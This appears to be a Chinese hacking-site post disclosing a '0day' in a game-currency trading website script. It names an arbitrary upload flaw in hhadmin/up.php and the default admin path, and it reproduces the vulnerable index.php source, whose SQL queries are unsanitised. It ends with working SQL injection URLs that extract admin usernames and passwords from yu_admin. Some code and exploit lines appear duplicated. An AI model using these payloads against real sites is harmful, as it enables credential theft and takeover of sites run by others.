>> 最新文章
>> 阅读排行
>> 推荐文章
当前位置:微微海外游戏币买卖代练系统0day
作者:小波微微海外游戏币买卖代练系统 0day厂商:http://www.hh-e.cn/hhadmin/up.php 任意上传漏洞默认后台地址:/hhadmin漏斗文件:index.php----------------------------------------------------- ...
作者:小波
微微海外游戏币买卖代练系统 0day
hhadmin/up.php 任意上传漏洞
默认后台地址:/hhadmin
漏斗文件:index.php
----------------------------------------------------------------------------------------------------------------
<?php
require("inc/conn.php");
<?php
require("inc/conn.php");
$sql_config=$db->query("select title,content from g_config");
while($rs_config=$db->fetch_array($sql_config)){$web_config[$rs_config[0]]=$rs_config[1];}
if($web_config['webclose']!='0'){exit($web_config["webclose"]);}
if(isset($_SESSION["huobi"])){$nowhuobi=$_SESSION["huobi"];}else{$nowhuobi=$web_config["webhuobi"];}
$huobi_idx=$db->get_one("select title,stitle,huilv from g_huobi where cntitle='$nowhuobi'");
if($huobi_idx){
$huobi_title=$huobi_idx[0];
$huobi_stitle=$huobi_idx[1];
$huobi_huilv=$huobi_idx[2];
}else{unset($_SESSION['huobi']);exit("Currency Error!");}
$time=date("Y-m-d H:i:s",time()-600);
$count=$db->get_one("select * from g_visits where addtime>'$time' and ip='$user_ip'");
if(!$count){
$db->query("insert into g_visits(ip,addtime) values('$user_ip','$showtime')");
}
$count=$db->get_one("select * from g_visits where addtime>'$time' and ip='$user_ip'");
if(!$count){
$db->query("insert into g_visits(ip,addtime) values('$user_ip','$showtime')");
}
switch($action){
case "ad";
$type=isset($_GET["type"])?$_GET["type"]:'';
if($type=="flash"){require("inc/modules/flash.php");}
elseif($type=='other'){
$id=(isset($_GET['id'])?$_GET['id']:'');
if(!$id){msg(0);}
$id_array =checkid($id);
$id=implode('_', $id_array);
$ad_other=$db->get_one("select title,pic from g_ad where id=$id");
if(!$ad_other){msg(404);}
echo "document.write(\"<a href='index.php?action=ad&type=go&id=$id' target='ad'><img src='$ad_other[1]' border='0'></a>\");";}
elseif($type=='go'){
$id=(isset($_GET['id'])?$_GET['id']:'');
if(!$id){msg(0);}
$id_array =checkid($id);
$id=implode('_', $id_array);
$ad_url=$db->get_one("select url from g_ad where id=$id");
if(!$ad_url){msg(404);}
$db->query("update g_ad set click=click+1 where id=$id");
//header("Location:".$ad_url[0]);
echo "<script>location.href='{$ad_url[0]}'</script>";
echo "<script>location.href='{$ad_url[0]}'</script>";
}
else{msg(0);}
break;
case "paypal";
$req = 'cmd=_notify-validate';
foreach ($_POST as $key => $value) {
$value = urlencode(stripslashes($value));
$req .= "&$key=$value";
}
$header .= "POST /cgi-bin/webscr HTTP/1.0";
$header .= "Content-Type: application/x-www-form-urlencoded";
$header .= "Content-Length: " . strlen($req) . "";
$fp = fsockopen ('ssl://www.paypal.com', 443, $errno, $errstr, 30);
$item_name = $_POST['item_name'];
$item_number = $_POST['item_number'];
$payment_status = $_POST['payment_status'];
$payment_amount = $_POST['mc_gross'];
$payment_currency = $_POST['mc_currency'];
$txn_id = $_POST['txn_id'];
$receiver_email = $_POST['receiver_email'];
$payer_email = $_POST['payer_email'];
if (!$fp) {
// HTTP ERROR
} else {
fputs ($fp, $header . $req);
while (!feof($fp)) {
$res = fgets ($fp, 1024);
if (strcmp ($res, "VERIFIED") == 0) {
$order_id=$item_number;
$db->query("update g_jbdd set paypal_back='$payer_email',paypal_money='$payment_amount $payment_currency' where order_id='$order_id'");
$db->query("update g_dldd set paypal_back='$payer_email',paypal_money='$payment_amount $payment_currency' where order_id='$order_id'");
$db->query("update g_zhdd set paypal_back='$payer_email',paypal_money='$payment_amount $payment_currency' where order_id='$order_id'");
$db->query("update g_zbdd set paypal_back='$payer_email',paypal_money='$payment_amount $payment_currency' where order_id='$order_id'");
}
else if (strcmp ($res, "INVALID") == 0) {
// log for manual investigation
}
}
fclose ($fp);
}
break;
case "login";
require("inc/modules/login.php");
break;
case "Currency";
$_SESSION["huobi"]=$_GET["type"];
exit("<script>history.back();</script>");
break;
default:
$webnowurl=$_SERVER["REQUEST_URI"];
$webnowurl=$_SERVER["REQUEST_URI"];
$webnowurl=substr($webnowurl,1);
require("inc/libs/Smarty.class.php");
$smarty=new Smarty();
$smarty->caching=$web_config['webcache'];
$smarty->compile_check = true;
$smarty->debugging = false;
$main_page=isset($_GET['main_page'])?$_GET['main_page']:'';
if(!$main_page){$main_page='index';}
if(file_exists("inc/modules/$main_page.php")){require("inc/modules/$main_page.php");}
if(!file_exists("templates/".$web_config['webstyle']."/$main_page.php")){msg(404);}
$sql_huobi=$db->query("select cntitle from g_huobi where cntitle<>'$nowhuobi'");
while($rs_huobi=$db->fetch_array($sql_huobi)){
$huobilist[]=array("cntitle"=>$rs_huobi[0]);
}
$smarty->assign('webname',$web_config['webname']);
$smarty->assign("webhtml",$web_config['webhtml']);
$smarty->assign('webkeywords',$web_config['keywords']);
$smarty->assign('webdescription',$web_config['description']);
$smarty->assign('nowhuobi',$nowhuobi);
$smarty->assign("huobi",$huobilist);
$smarty->assign("huobi_title",$huobi_title);
$smarty->assign("huobi_stitle",$huobi_stitle);
$smarty->assign("huobi_huilv",$huobi_huilv);
$smarty->assign("webnowurl",$webnowurl);
$smarty->display($web_config['webstyle']."/$main_page.php");
$_SESSION['nowurl']=$_SERVER['REQUEST_URI'];
break;
}
$db->close();
?>
-----------------------------------------------------------------------------------------------------------------
exp
http://site.com/index.php?main_page=buyitems&gid=-10 union select 1,admin_name from yu_admin/*xiaobo
-----------------------------------------------------------------------------------------------------------------
exp
http://site.com/index.php?main_page=buyitems&gid=-10 union select 1,admin_name from yu_admin/*xiaobo
http://site.com/index.php?main_page=buyitems&gid=-10 union select 1,admin_pwd from yu_admin/*xiaobo